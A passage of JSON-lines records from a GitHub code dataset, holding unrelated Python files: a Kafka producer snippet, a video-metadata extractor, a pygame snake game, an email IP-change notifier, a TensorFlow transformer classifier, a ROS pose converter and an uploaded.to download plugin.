'offset': msg.offset(),\n 'headers': msg.headers(),\n 'key': msg.key(),\n 'value': msg.value()}\n\n if self.callback:\n self.callback(err, msg_dict)\n\n\nif __name__ == '__main__':\n\n import pprint\n\n from base.logger import set_std_logging\n\n pp = pprint.PrettyPrinter(indent=2)\n\n set_std_logging()\n\n conf = {\"bootstrap.servers\": \"ec2-13-124-71-40.ap-northeast-2.compute.amazonaws.com:9092\",\n \"request.required.acks\": 1,\n \"socket.timeout.ms\": 10000,\n \"logger\": log\n #\"debug\": \"broker,producer\"}\n }\n\n topic = \"dwdb-ods\"\n\n print(f\"Kafka Configuration:\\n{pp.pformat(conf)}\\n{topic}\\n\")\n producer = Producer(conf, 2, 10000)\n value = b\"hello\"\n key = b\"OCI_WTHR\"\n 
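# The \"flag\" headers below are framing markers: START_TABLE, then one START_FILE per file, then END_TABLE,\n    # letting a consumer rebuild table/file boundaries from otherwise empty-valued records.\n    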
producer.produce(topic, None, key, headers={\"flag\": \"START_TABLE\"})\n    producer.produce(topic, None, key, headers={\"flag\": \"START_FILE\", \"filename\": \"aaa.txt\"})\n    producer.produce(topic, None, key, headers={\"flag\": \"END_TABLE\"})\n    producer.flush()\n","repo_name":"etri-city-traffic-brain/traffic-data-mgmt","sub_path":"etri_data_collect_provider/online_and_realtime_loader-dj_etri/base/kafka/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"}
{"seq_id":"1788249482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 27 19:47:01 2020\r\n\r\n@author: tiago\r\n\"\"\"\r\n\r\n\r\nimport numpy as np # matrix processing\r\nimport pandas as pd\r\nimport math\r\n\r\nfrom IPython import get_ipython\r\nipy = get_ipython()\r\nif ipy is not None:\r\n    ipy.run_line_magic('matplotlib', 'inline')\r\n\r\nimport matplotlib.pyplot as plt # for displaying images\r\nplt.rcParams['image.cmap'] = 'gray'\r\n# for reading/saving videos\r\nimport imageio\r\n\r\n\r\n\r\n# Create a video reader object\r\nfile_name = \"4.Video3 Terapia Rami.mp4\"\r\nprint(\"Opening video...\")\r\nvid_reader = imageio.get_reader(file_name)\r\n\r\n# inspect the video metadata\r\nmdata = vid_reader.get_meta_data()\r\nprint(\"The metadata is:\")\r\nprint(mdata)\r\n\r\n# wrap the dict in a list so pandas builds a single row; passing a dict of\r\n# scalars directly would raise \"If using all scalar values, you must pass an index\"\r\ndf = pd.DataFrame([mdata])\r\n\r\ndf.to_excel('Metadatos.xlsx')","repo_name":"Tiago1704/Extracci-n-de-metadatos-de-arch-de-video","sub_path":"Extrayendo metadatos de un archivo de videoV2.py","file_name":"Extrayendo metadatos de un archivo de videoV2.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"31915014819","text":"import pygame, sys\nimport random\nimport math\nfrom pygame.locals import *\n\nLOCAL_KEYS = [\n    (K_LEFT, K_RIGHT),\n    (K_a, K_d)\n]\n\nWORM_SIZE = 6\n\nWHITE=pygame.color.Color(255,255,255)\nBLACK=pygame.color.Color(0,0,0)\nTRANSPARENT_COLOR=pygame.color.Color(255,255,255, 0)\nBACKGROUND_COLOR=WHITE\n\ndef darken(color):\n    return pygame.color.Color(\n        round(color.r * 0.5),\n        round(color.g * 0.5),\n        round(color.b * 0.5)\n    )\n\ndef lighten(color):\n    return pygame.color.Color(\n        max(150, min(255, round(color.r * 2))),\n        max(150, min(255, round(color.g * 2))),\n        max(150, min(255, round(color.b * 2)))\n    )\n\ndef are_same_color(c1, c2):\n    return c1.r == c2.r and c1.g == c2.g and c1.b == c2.b\n\ndef rect_corners(rect):\n    x, y, w, h = rect\n    return [\n        (x+1, y+1),\n        (x + w-1, y+1),\n        (x+1, y + h-1),\n        (x + w-1, y + h-1)\n    ]\n\nclass VaryingWormStateInterval(object):\n    \"\"\"A helper for keeping track of worm state. 
Toggles automatically between \"on\" and \"off\" with varying intervals\"\"\"\n def __init__(self):\n self.on = True\n self.length = self.randomize_length(self.on)\n\n def randomize_length(self, on):\n if on:\n return random.randint(50, 150)\n else:\n return random.randint(10, 15)\n\n def update(self):\n self.length -= 1\n if self.length <= 0:\n self.on = not self.on\n self.length = self.randomize_length(self.on)\n\n def is_on(self):\n return self.on\n\n\ndef find_worm_command(players, event):\n for p, k in zip(players, LOCAL_KEYS):\n is_keydown = event.type == KEYDOWN\n if event.key == k[0]:\n return TurnCommand(p, 'LEFT', is_keydown)\n elif event.key == k[1]:\n return TurnCommand(p, 'RIGHT', is_keydown)\n return None\n\nclass ColorWheel(object):\n def __init__(self):\n self.colors = [\n pygame.color.Color(200, 0, 0),\n pygame.color.Color(0, 200, 0),\n pygame.color.Color(0, 0, 200),\n pygame.color.Color(100, 100, 100),\n pygame.color.Color(50, 100, 150),\n pygame.color.Color(150, 100, 50)\n ]\n self.index = 0\n\n def next(self):\n ix = self.index % len(self.colors)\n color = self.colors[ix]\n self.index += 1\n return color\n\ncolor_wheel = ColorWheel()\n\ndef random_player_from_screen_rect(rect, color):\n center = rect.center\n radius = 0.8 * min(rect.width, rect.height) / 2\n\n theta = random.random() * 2 * math.pi\n x = radius * math.cos(theta)\n y = radius * math.sin(theta)\n pos = (x + center[0], y + center[1])\n return Player(pos, theta + math.pi, color)\n\nclass WormRect(object):\n def __init__(self, rect, player):\n self.rect = rect\n self.player = player\n\n def get_player(self):\n return self.player\n\n def get_rect(self):\n return self.rect\n\nclass Player(object):\n def __init__(self, pos, theta, color):\n self.original_pos = pos\n self.original_theta = theta\n self.reset()\n self.color = color\n self.state = VaryingWormStateInterval()\n\n def get_color(self):\n return self.color\n\n def get_head_color(self):\n return darken(self.color)\n\n def get_hole_color(self):\n return lighten(self.color)\n\n def is_hole(self):\n return not self.state.is_on()\n\n def turn(self, direction, start=False):\n if direction not in ['LEFT', 'RIGHT']:\n raise \"Direction must be 'LEFT' or 'RIGHT'\"\n if not start:\n if self.turning == direction:\n self.stop_turning()\n else:\n self.turning = direction\n\n def update(self, speed):\n self.state.update()\n dx = math.cos(self.heading) * speed\n dy = math.sin(self.heading) * speed\n x = self.pos[0] + dx\n y = self.pos[1] + dy\n self.pos = x, y\n\n if self.turning:\n if self.turning == 'LEFT':\n self.heading -= 0.05\n elif self.turning == 'RIGHT':\n self.heading += 0.05\n return self.pos\n\n def get_worm_rect(self, size):\n x = self.pos[0] - size/2\n y = self.pos[1] - size/2\n return WormRect(\n (x, y, size, size),\n self\n )\n\n def stop_turning(self):\n self.turning = None\n\n def is_dead(self):\n return self.dead\n\n def set_dead(self, b):\n self.dead = b\n\n def reset(self):\n self.dead = False\n self.pos = self.original_pos\n self.heading = self.original_theta\n self.turning = None\n\n\nclass FifoQueue(object):\n def __init__(self):\n self.items = []\n\n def put(self, item):\n self.items.append(item)\n\n def get(self):\n item = self.items[0]\n self.items = self.items[1:]\n return item\n\n def size(self):\n return len(self.items)\n\n def is_empty(self):\n return len(self.items)\n\n def get_items(self):\n return self.items\n\n\nclass CountdownState(object):\n def __init__(self):\n self.started = False\n\n def did_finish(self, updated_time):\n return 
self.get_count(updated_time) == 0\n\n def start(self, start_time):\n self.started = True\n self.start_time = start_time\n\n def did_start(self):\n return self.started\n\n def get_count(self, updated_time):\n INITIAL_COUNT = 3\n if not self.started:\n return INITIAL_COUNT\n return max(0, INITIAL_COUNT - math.ceil((updated_time - self.start_time) / 1000))\n\nclass TurnCommand(object):\n def __init__(self, player, direction, start=True):\n self.start = start\n self.player = player\n self.direction = direction\n\n def perform(self):\n self.player.turn(self.direction, self.start)\n\ndef main():\n pygame.display.init()\n pygame.font.init()\n\n recent_rects = FifoQueue()\n\n # Set up display\n DEPTH=32\n DISPLAY=pygame.display.set_mode((640,480),0,DEPTH)\n TEMPORARY_RECTS=pygame.surface.Surface(DISPLAY.get_size(),SRCALPHA,DEPTH)\n BACKBUFFER=pygame.surface.Surface(DISPLAY.get_size(),SRCALPHA,DEPTH)\n COLLISION_MASK=pygame.surface.Surface(DISPLAY.get_size(),0,8)\n\n COLLISION_MASK.fill(WHITE)\n DISPLAY.fill(BACKGROUND_COLOR)\n BACKBUFFER.fill(BACKGROUND_COLOR)\n\n # Font stuff\n font = pygame.font.SysFont(next(f for f in pygame.font.get_fonts() if 'roman' in f), 50)\n game_over = font.render(\"HE DED.\", True, BLACK)\n game_over_rt = game_over.get_rect()\n game_over_rt.center = DISPLAY.get_rect().center\n\n digits = [font.render(str(i), True, BLACK) for i in range(1, 4)]\n\n countdown = CountdownState()\n\n # Players\n colors = ColorWheel()\n players = [random_player_from_screen_rect(DISPLAY.get_rect(), colors.next())\n for _ in range(2)]\n player = players[0]\n\n # Game Loop\n start_ticks = pygame.time.get_ticks()\n exit = False\n show_collision_mask = False\n while not exit:\n worm_commands = []\n current_time = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type==QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_SPACE:\n DISPLAY.fill(BACKGROUND_COLOR)\n player.reset()\n elif event.key == K_ESCAPE:\n exit = True\n elif event.key == K_TAB:\n show_collision_mask = not show_collision_mask\n else:\n command = find_worm_command(players, event)\n if command:\n worm_commands.append(command)\n elif event.type == KEYUP:\n command = find_worm_command(players, event)\n if command:\n worm_commands.append(command)\n\n for c in worm_commands:\n c.perform()\n\n for p in players:\n if not p.is_dead():\n p.update(speed=2)\n\n # Generate the new rectangles for each player\n rts = [p.get_worm_rect(WORM_SIZE) for p in players if not p.is_dead()]\n recent_rects.put(rts)\n\n # player rects older than 10 generations get\n # \"persisted\" to screen bitmap\n if recent_rects.size() > 10:\n oldest_player_rects = recent_rects.get()\n for wrt in oldest_player_rects:\n p = wrt.get_player()\n rt = wrt.get_rect()\n if p.is_hole():\n c = p.get_hole_color()\n else:\n c = p.get_color()\n COLLISION_MASK.fill(BLACK, rt)\n BACKBUFFER.fill(c, rt)\n\n # redraw overlay\n TEMPORARY_RECTS.fill(TRANSPARENT_COLOR)\n for generation in recent_rects.get_items():\n for wrt in generation:\n rt = wrt.get_rect()\n p = wrt.get_player()\n c = p.get_head_color()\n TEMPORARY_RECTS.fill(c, rt)\n\n if show_collision_mask:\n DISPLAY.blit(COLLISION_MASK, (0,0))\n else:\n DISPLAY.blit(BACKBUFFER, (0,0))\n DISPLAY.blit(TEMPORARY_RECTS, (0,0))\n\n if all(p.is_dead() for p in players):\n DISPLAY.blit(game_over, game_over_rt.topleft)\n\n if not countdown.did_finish(current_time):\n countdown_loop(digits, TEMPORARY_RECTS, countdown)\n\n COLLISION_MASK.lock()\n for p in players:\n if p.is_dead():\n 
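# a dead worm keeps its old trail on the backbuffer but is skipped by the collision tests\n                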
continue\n rt = p.get_worm_rect(WORM_SIZE).get_rect()\n for pt in rect_corners(rt):\n x = int(pt[0])\n y = int(pt[1])\n if x < 0 or y < 0 or x >= DISPLAY.get_width() or y >= DISPLAY.get_height():\n p.set_dead(True)\n break\n color = COLLISION_MASK.get_at((x, y))\n if not are_same_color(color, WHITE):\n BACKBUFFER.fill((250,0,0), (x, y, 3, 3))\n p.set_dead(True)\n COLLISION_MASK.unlock()\n\n pygame.display.update()\n\n pygame.time.wait(10)\n\n\ndef countdown_loop(digits, background, countdown):\n DISPLAY = pygame.display.get_surface()\n while True:\n current_time = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type==QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n sys.exit()\n elif not countdown.did_start():\n countdown.start(current_time);\n\n if countdown.did_finish(current_time):\n return\n\n DISPLAY.fill(BACKGROUND_COLOR)\n DISPLAY.blit(background, (0,0))\n digit = digits[countdown.get_count(current_time) - 1]\n\n rt = digit.get_rect()\n rt.center = DISPLAY.get_rect().center\n\n DISPLAY.blit(digit, rt)\n pygame.display.update()\n\n pygame.time.wait(100)\n\nmain()\n\n","repo_name":"epeld/snakes","sub_path":"snakes.py","file_name":"snakes.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10764384097","text":"from win32 import win32crypt\nimport wmi\n\nimport win32api\nimport win32con\nimport win32evtlog\nimport win32security\nimport win32evtlogutil\n\nimport copy\nimport hashlib\nimport json\nimport time\nimport random\nimport signal\nimport string\nimport os, sys, re\nimport requests, smtplib \nfrom email.mime.text import MIMEText\n\nclass REPORT_CONSTANT(object):\n \n CONFIG_FILE_PATH = os.path.dirname(__file__) + os.sep + \"config.conf\"\n\n CONFIGURATION = {\n \"IP_ADDR_PROVIDER\": \"http://jsonip.com\",\n \"IP_ADDR_PROVIDER_RESPONSE_TYPE\" : \"json\",\n \"IP_ADDR_PROVIDER_IP_ATTR_NAME\" : \"ip\",\n \"SENDER_INFO_PATH\" : \"{0}\".format(os.path.dirname(__file__) + os.sep + \"host.bin\"),\n \"TARGET_INFO_PATH\" : \"{0}\".format(os.path.dirname(__file__) + os.sep + \"admin.bin\"),\n \"TIME_DELTA\": 300,\n \"TITLE\" : \"[Report] Your ip address was changed.\",\n \"MESSAGE\": \"Your ip address was changed. 
Your current ip address is #{ip} at #{time}.\"\n }\n\n EVENT_ID = {\n 58701 : [win32evtlog.EVENTLOG_INFORMATION_TYPE, [\"Initialize new email sender process\"]],\n 58702 : [win32evtlog.EVENTLOG_INFORMATION_TYPE, [\"Transport success\"]],\n 58703 : [win32evtlog.EVENTLOG_ERROR_TYPE, [\"Connection disabled\"]],\n 58704 : [win32evtlog.EVENTLOG_WARNING_TYPE, [\"Configuration changed\"]],\n 58705 : [win32evtlog.EVENTLOG_INFORMATION_TYPE, [\"Service exit\"]],\n 58706 : [win32evtlog.EVENTLOG_WARNING_TYPE, [\"Detect improper access\"]],\n 58799 : [win32evtlog.EVENTLOG_WARNING_TYPE, [\"Missing event\"]]\n }\n\nclass SecureMailSender(object):\n SALT_LENGTH = 24\n\n @staticmethod\n def randstring(text):\n return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(SecureMailSender.SALT_LENGTH)) + \"||\" + \\\n text + \"||\" + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(SecureMailSender.SALT_LENGTH))\n\n @staticmethod\n def build_credential_to_json(cred):\n if(isinstance(cred, dict)):\n return json.dumps(cred)\n return None\n\n @staticmethod\n def encrypt_credential(path, text):\n if(path != None):\n if(os.path.exists(path)):\n os.remove(path)\n with open(path, \"wb\") as file:\n file.write(win32crypt.CryptProtectData(SecureMailSender.randstring(text).encode('utf-8'), None, None, None, None, 0))\n return b''\n return win32crypt.CryptProtectData(SecureMailSender.randstring(text).encode('utf-8'), None, None, None, None, 0)\n\n @staticmethod\n def generate_host_id():\n c = wmi.WMI()\n seed = \"{0}{1}\".format(c.Win32_Processor()[0].ProcessorId, c.Win32_DiskDrive()[0].SerialNumber)\n return hashlib.sha256(seed.encode()).hexdigest()\n \n @staticmethod\n def decrypt_credential(path, text = None):\n result = ('', b'')\n if(path != None):\n if(os.path.exists(path)):\n with open(path, \"rb\") as file:\n line = file.read()\n result = win32crypt.CryptUnprotectData(line, None, None, None, 0)\n else:\n result = win32crypt.CryptUnprotectData(text, None, None, None, 0)\n return result[-1].decode('utf-8').split(\"||\")[1]\n\n @staticmethod\n def send_mail(sender, receiver, subject, body):\n credential = json.loads(sender)\n if(credential[\"mac\"]!=SecureMailSender.generate_host_id()):\n return (False, -1)\n try:\n smtp = smtplib.SMTP(credential[\"server\"], credential[\"port\"])\n smtp.ehlo()\n smtp.starttls()\t# TLS\n smtp.login(credential[\"email\"], credential[\"key\"])\n msg = MIMEText(body)\n msg['Subject'] = subject\n msg['To'] = receiver\n smtp.sendmail(credential[\"email\"],receiver,msg.as_string())\n smtp.quit()\n except Exception as e:\n del credential\n return (False, e)\n del credential\n return (True, None)\n\n @staticmethod\n def send_mail_s(sender, receiver, subject, body):\n credential = json.loads(sender)\n recv_accnt = json.loads(receiver)\n\n if(credential[\"mac\"]!=SecureMailSender.generate_host_id()):\n return (False, -1)\n\n try:\n smtp = smtplib.SMTP(credential[\"server\"], credential[\"port\"])\n smtp.ehlo()\n smtp.starttls()\t# TLS\n smtp.login(credential[\"email\"], credential[\"key\"])\n msg = MIMEText(body)\n msg['Subject'] = subject\n msg['To'] = recv_accnt[\"email\"]\n smtp.sendmail(credential[\"email\"], recv_accnt[\"email\"], msg.as_string())\n smtp.quit()\n except Exception as e:\n del credential\n return (False, e)\n del credential\n return (True, None)\n\nclass EventLogger(object):\n def __init__(self, name, opcode):\n ph = win32api.GetCurrentProcess()\n th = win32security.OpenProcessToken(ph, 
win32con.TOKEN_READ)\n self.__sid = win32security.GetTokenInformation(th, win32security.TokenUser)[0]\n self.__opcode = opcode\n self.applicationName = name\n\n def __report(self, eventID, message):\n win32evtlogutil.ReportEvent(self.applicationName, eventID, eventCategory = 5, \n eventType = REPORT_CONSTANT.EVENT_ID.get(eventID, 58799)[0], \n strings = message, data = \"Application\\0Data\".encode(\"ascii\"), sid = self.__sid)\n \n def log_write(self, eventID, message = \"\"):\n msg = REPORT_CONSTANT.EVENT_ID.get(eventID, 58799)[1]\n if(len(message)>0):\n msg += [message] if type(message)==str else message\n if(self.__opcode == False):\n print(msg)\n else:\n self.__report(eventID, msg)\n\nclass IpChangeNotifier():\n def __init__(self, opcode):\n self.__CONFIG = None\n self.__opcode = opcode\n self.__logger = EventLogger(self.__class__.__name__, self.__opcode)\n \n self.__transTable = {\n \"#{ip}\" : \"127.0.0.1\",\n \"#{time}\" : time.ctime()\n }\n self.__read_config()\n\n def __del__(self):\n del self.__logger\n # Sth to clear\n\n def __read_config(self):\n self.__CONFIG = copy.deepcopy(REPORT_CONSTANT.CONFIGURATION)\n if(os.path.exists(REPORT_CONSTANT.CONFIG_FILE_PATH)==False):\n with open(REPORT_CONSTANT.CONFIG_FILE_PATH, \"w\") as file:\n file.write(json.dumps(REPORT_CONSTANT.CONFIGURATION, indent=4))\n return\n try:\n with open(REPORT_CONSTANT.CONFIG_FILE_PATH, \"r\") as file:\n self.__CONFIG = json.load(file)\n self.__CONFIG[\"TIME_DELTA\"] = int(self.__CONFIG[\"TIME_DELTA\"])\n if(self.__CONFIG[\"TIME_DELTA\"] < 60):\n self.__CONFIG[\"TIME_DELTA\"] = 300\n except:\n return\n\n def __update_table(self, ip):\n self.__transTable.update({\"#{ip}\": ip})\n self.__transTable.update({\"#{time}\": time.ctime()})\n\n def get_ip_address(self):\n if(self.__CONFIG[\"IP_ADDR_PROVIDER_RESPONSE_TYPE\"].lower() == \"json\"): # e.g. https://api.ipify.org?format=json or http://jsonip.com etc..\n try:\n return (True, requests.get(self.__CONFIG[\"IP_ADDR_PROVIDER\"]).json()[self.__CONFIG[\"IP_ADDR_PROVIDER_IP_ATTR_NAME\"]])\n except Exception as e:\n return (False, e)\n elif(self.__CONFIG[\"IP_ADDR_PROVIDER_RESPONSE_TYPE\"].lower() == \"text\"): # e.g. 
https://api.ipify.org\n try:\n return (True, requests.get(self.__CONFIG[\"IP_ADDR_PROVIDER\"]).text)\n except Exception as e:\n return (False, e)\n return (False, 0)\n\n def write_form(self, sender, receiver, title, body):\n SecureMailSender.send_mail_s(sender, receiver, title, body)\n\n def register(self):\n if(os.path.exists(self.__CONFIG[\"SENDER_INFO_PATH\"]) == False):\n sender_info = dict.fromkeys(['mac','server','email','key','port'])\n sender_info.update({\"mac\": str(SecureMailSender.generate_host_id()).strip()})\n sender_info.update({\"email\": str(input(\"[1] Enter your email account:\\n\")).strip()})\n sender_info.update({\"key\": str(input(\"[2] Enter your app key to login your email account:\\n\")).strip()})\n sender_info.update({\"server\": str(input(\"[3] Enter your SMTP server:\\n\"))})\n u = str(input(\"[4] Enter SMTP server port:\\n\")).strip()\n sender_info.update({\"port\": int(u) if u.isdigit() and int(u) in range(1, 65536) else 587})\n SecureMailSender.encrypt_credential(self.__CONFIG[\"SENDER_INFO_PATH\"], \n SecureMailSender.build_credential_to_json(sender_info))\n self.__logger.log_write(58704, \"New sender is registered.\")\n print(\"[*] If you want to edit title and content, modify the config.conf file.\")\n if(os.path.exists(self.__CONFIG[\"TARGET_INFO_PATH\"]) == False):\n recv_info = dict.fromkeys(['mac','server','email','key','port'], ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(SecureMailSender.SALT_LENGTH)))\n recv_info.update({\"email\": str(input(\"[1] Enter listener's email account:\\n\")).strip()})\n SecureMailSender.encrypt_credential(self.__CONFIG[\"TARGET_INFO_PATH\"], \n SecureMailSender.build_credential_to_json(recv_info))\n self.__logger.log_write(58704, \"New listener is registered.\")\n\n def begin(self):\n pattern = re.compile(\"|\".join(map(re.escape,self.__transTable.keys())))\n sender = \"\"\n receiver = \"\"\n current = \"\"\n\n while(True):\n ip = self.get_ip_address()\n if(ip[0] == False):\n message = \"[!] IP notifier is currently unable to obtain external IP addresses from [{0}]\\nReason: {1}\".format(self.__CONFIG[\"IP_ADDR_PROVIDER\"], str(ip[1]))\n self.__logger.log_write(58703, message)\n if(ip[1]==0):\n break\n time.sleep(self.__CONFIG[\"TIME_DELTA\"])\n\n if(ip[1] != current):\n try:\n sender = SecureMailSender.decrypt_credential(self.__CONFIG[\"SENDER_INFO_PATH\"])\n receiver = SecureMailSender.decrypt_credential(self.__CONFIG[\"TARGET_INFO_PATH\"])\n except:\n message = \"[!] Credentials are corrupted.\"\n self.write_form(sender, receiver, \"[!] Credentials are corrupted.\", message)\n self.__logger.log_write(58706, message)\n break\n \n current = ip[1]\n self.__update_table(ip[1])\n title = pattern.sub(lambda match: self.__transTable[match.group(0)], self.__CONFIG[\"TITLE\"])\n body = pattern.sub(lambda match: self.__transTable[match.group(0)], self.__CONFIG[\"MESSAGE\"])\n r, e = SecureMailSender.send_mail_s(sender, receiver, title, body)\n if(r == False and e == -1):\n message = \"[!] Credentials are corrupted.\"\n self.write_form(sender,receiver, \"[!] Credentials are corrupted.\", message)\n self.__logger.log_write(58706, message)\n break\n elif(r == False):\n message = \"[!] 
An error has occurred: {0}\".format(e)\n self.__logger.log_write(58799, message)\n else:\n self.__logger.log_write(58702)\n time.sleep(self.__CONFIG[\"TIME_DELTA\"])\n\n def loop(self):\n self.__logger.log_write(58701)\n self.register()\n self.begin()\n self.__logger.log_write(58705)\n \nif __name__ == \"__main__\":\n def signal_handler(signal, frame):\n sys.exit(0)\n signal.signal(signal.SIGINT, signal_handler)\n\n iNot = IpChangeNotifier(True)\n iNot.loop()\n sys.exit(0)\n","repo_name":"Gibartes/IPChangeNotifier","sub_path":"IPChangeNotifier.py","file_name":"IPChangeNotifier.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3556346175","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: wensong\n\nimport os\nimport sys\nimport tensorflow as tf\nfrom tf_base_classifier import TFBaseClassifier\nfrom layers.tf_embedding_layer import TFEmbeddingLayer\nfrom layers.tf_pos_encoding_layer import TFPosEncodingLayer\nfrom layers.tf_multihead_att_layer import TFMultiHeadAttLayer\nfrom layers.tf_feedforward_layer import TFFeedForwardLayer\nfrom layers.tf_classifier_layer import TFClassifierLayer\n\n\nclass TFTransformerClassifier(TFBaseClassifier):\n '''Multi-Head Attention分类器\n '''\n def __init__(self, flags):\n '''\n Args:\n flags: 全局参数,包含learning_rate、classifier_type等参数\n '''\n # 初始化基类\n TFBaseClassifier.__init__(self, flags)\n # 此分类器参数\n self.hidden_sizes = list(map(int, flags.hidden_sizes.split(\",\")))\n self.dropout_rate = 1.0 - self.flags.keep_prob\n if not self.flags.training:\n self.dropout_rate = 0.\n\n def build_model(self):\n '''构建模型\n '''\n embedding_layer = TFEmbeddingLayer(\n input_x=self.input_x,\n vocab_size=self.flags.vocab_size,\n emb_size=self.flags.emb_size,\n keep_prob=self.flags.keep_prob,\n training=self.flags.training,\n pretrain_word_vecs=self.pretrain_word_vecs).build()\n\n # add pos encoding\n embedding_layer += TFPosEncodingLayer(\n in_hidden=embedding_layer,\n max_seq_len=self.flags.max_seq_len).build()\n embedding_layer = tf.layers.dropout(embedding_layer,\n rate=self.dropout_rate,\n training=self.flags.training)\n # Transformer Blocks\n encoder = embedding_layer # [B, T, D]\n for i in range(self.flags.num_blocks):\n with tf.variable_scope(\"num_blocks_{}\".format(i),\n reuse=tf.AUTO_REUSE):\n # multihead attention\n encoder = TFMultiHeadAttLayer(queries=encoder,\n keys=encoder,\n dropout_rate=self.dropout_rate,\n training=self.flags.training,\n causality=False).build()\n\n # FFN\n encoder = TFFeedForwardLayer(\n in_hidden=encoder,\n num_units=[self.flags.hidden_size,\n self.flags.emb_size]).build()\n\n # mean or max pooling: [B, T, D] -> [B, D]\n encoder = tf.reduce_mean(encoder, axis=1)\n\n # [B, D] -> [B, cls_num]\n self.probability, self.logits, self.loss = TFClassifierLayer(\n training=self.flags.training,\n in_hidden=encoder,\n cls_num=self.flags.cls_num,\n cls_type=self.flags.cls_type,\n input_y=self.input_y,\n keep_prob=self.flags.keep_prob,\n l2_reg_lambda=self.flags.l2_reg_lambda).build()\n\n # 返回模型引用\n return self\n","repo_name":"snowhws/deeplearning","sub_path":"models/nlp/classification/tf_transformer_classifier.py","file_name":"tf_transformer_classifier.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"71792795130","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport yaml\nimport argparse\nimport 
sys\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert old poses to new motion format.')\n parser.add_argument('infile', nargs='?',\n help='input poses parameter file [default: stdin]',\n default='/dev/stdin')\n parser.add_argument('outfile', nargs='?',\n help='output poses parameter file [default: stdout]',\n default='/dev/stdout')\n\n args = parser.parse_args()\n\n with open(args.infile) as f:\n poses = yaml.load(f.read())\n\n if poses is None:\n print(\"uh oh, nothing could be read from the input :(\", file=sys.stderr)\n return\n\n for n, toplevel in poses.iteritems():\n if 'poses' not in toplevel:\n print(\"no poses to convert, I'm done here.\", file=sys.stderr)\n return\n if not 'motions' in toplevel:\n toplevel['motions'] = {}\n for pn, pose in toplevel['poses'].iteritems():\n print(\"converting pose '{}'\".format(pn), file=sys.stderr)\n joints, positions = [list(x) for x in zip(*pose.items())]\n points = {'positions': positions, 'time_from_start': 0.0}\n toplevel['motions'][pn] = {'joints': joints, 'points': [points]}\n del toplevel['poses']\n\n print(\"writing to output file\", file=sys.stderr)\n with open(args.outfile, \"w\") as f:\n yaml.dump(poses, f)\n print(\"finished! You're all set.\", file=sys.stderr)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pal-robotics/play_motion","sub_path":"play_motion/scripts/convert_poses.py","file_name":"convert_poses.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"39466347802","text":"#python libs\nimport logging\nlogger = logging.getLogger(__name__) #__name___ = nombre del modulo. logging.getLogger = Usa la misma instancia de clase (del starter.py).\n\n#Libs\nfrom core.plugins_core import PluginsCore\n\n\nBASE_URL = \"http://uploaded.to\"\nWAITING = 20\n\n\nclass PluginDownload(PluginsCore):\n def __init__(self, *args, **kwargs):\n PluginsCore.__init__(self, *args, **kwargs)\n\n def parse(self):\n link = self.link\n file_id = self.get_file_id()\n form_url = BASE_URL + \"/io/ticket/slot/\" + file_id\n page = self.get_page(form_url, form={})\n m = self.get_match('(succ:true)', page)\n if m is not None:\n page = self.get_page(link)\n self.countdown('period: (?P[^<]+)', page, 320, WAITING)\n js_url = BASE_URL + \"/js/download.js\"\n page = self.get_page(js_url)\n c_pattern = 'Recaptcha\\.create\\(.*?\"(?P[^\"]+)'\n self.next_link = BASE_URL + \"/io/ticket/captcha/\" + file_id\n page = self.recaptcha(c_pattern, page)\n #resume fix\n self.content_range = None\n self.source = self.click('url:\\'(?P[^\\']+)', page, False)\n else: #link not found\n pass\n\n def recaptcha_post(self, pattern, page, challenge, response, extra_fields=None):\n #overrided method\n form_list = [(\"recaptcha_challenge_field\", challenge), (\"recaptcha_response_field\", response)]\n if extra_fields:\n form_list.extend(extra_fields)\n page = self.get_page(self.next_link, form_list, page)\n if \"Sie haben die max.\" in page:\n self.err_msg = \"Limit Exceeded\"\n self.limit_exceeded = True\n return (\"Limit Exceeded\", page)\n elif \"download\" in page:\n return (None, page)\n else: #{err:\"captcha\"}\n return (\"Wrong captcha\", page)\n\n def get_file_id(self):\n if \"/ul.to/\" in self.link:\n file_id = self.link.split(\"/ul.to/\")[-1].split(\"/\")[0]\n else:\n file_id = self.link.split(\"/file/\")[-1].split(\"/\")[0]\n return 
